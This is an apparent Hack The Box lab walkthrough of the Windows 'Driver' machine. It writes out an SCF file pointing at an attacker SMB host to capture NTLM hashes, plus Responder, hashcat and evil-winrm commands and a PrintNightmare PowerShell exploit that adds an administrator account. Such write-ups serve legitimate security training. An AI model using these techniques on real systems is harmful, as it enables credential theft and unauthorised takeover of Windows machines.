Driver — Hackthebox Walkthrough

I am happy to say that finally someone made an easy Windows box on HTB. Great thanks to @MrR3boot for that. I loved this box as it had a pretty unique attack path and didn’t need much knowledge about Windows Specifics.

User

Starting off with nmap I saw there were couple of ports open. Port 80,5985 (HTTP) and 135,445(SMB).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Visiting the web server on port 80, it was a static website about firmware updates in printers. Looking around a bit, I saw a page that allowed me to upload firmwares.

Since the page stated that the uploaded files are stored in a file share and manually checked, I knew this had something to do with the SMB server we saw in the nmap results.

However, I tried uploading PHP reverse shells to see if I can get a shell that was but that was a bust. So I had to do some digging. While I was looking, I came across this article which explains about SFC file attacks with SMB shares.

SMB Share - SCF File Attacks

As mentioned in the article, I made a SFC file called “attack.sfc”.

[Shell]  
Command=2  
IconFile=\\10.10.14.235\test\test.ico  
[Taskbar]  
Command=ToggleDesktop

Then I started a responder.

sudo responder -I tun0 -vv

Finally I uploaded the the attack.sfc file I made. Then I got the NTLM hash of the tony user.

What seems to have happened was, when the attack.sfc file is uploaded, the tony user must have logged in to SMB server and browsed the file. Since the Iconfile had a pointer to our SMB server, responder was able to catch the hash of the tony user.

Then I used hashcat to crack the captured hash.

hashcat -m 5600 --force hash.txt rockyou.txt

I got the password as liltony. With this, I used evil-winrm and logged in to the box as tony.

evil-winrm.rb -u tony -p liltony -i 10.10.11.106

Root

First off, I uploaded and ran winpeas.exe for basic enumeration. There were no any eye-catching vulnerabilities to find but I saw “spoolsv” was running.

So I googled about this and found put about a CVE. This was called PrintNightmare. Just like the name rhymes, this exploits a native built-in Windows service named “Print Spooler” that is enabled by default on Windows machines.

With a little effort, I found a Powershell exploit from GitHub to exploit this.

GitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler…

So I cloned this repository and uploaded the Powershell script to the box. But before running the script I had to do some changes to the Execution Policy to be able to import the Powershell module I uploaded.

set-ExecutionPolicy RemoteSigned -Scope CurrentUser

Then as mentioned in the README.md I imported the Powershell script and ran it.

Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare

The script added a new user to the administrator group called adm1n with a password of P@ssw0rd . Finally, I was able to log in with those credentials and get administrative access to the machine.

Rooted!!!

“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😄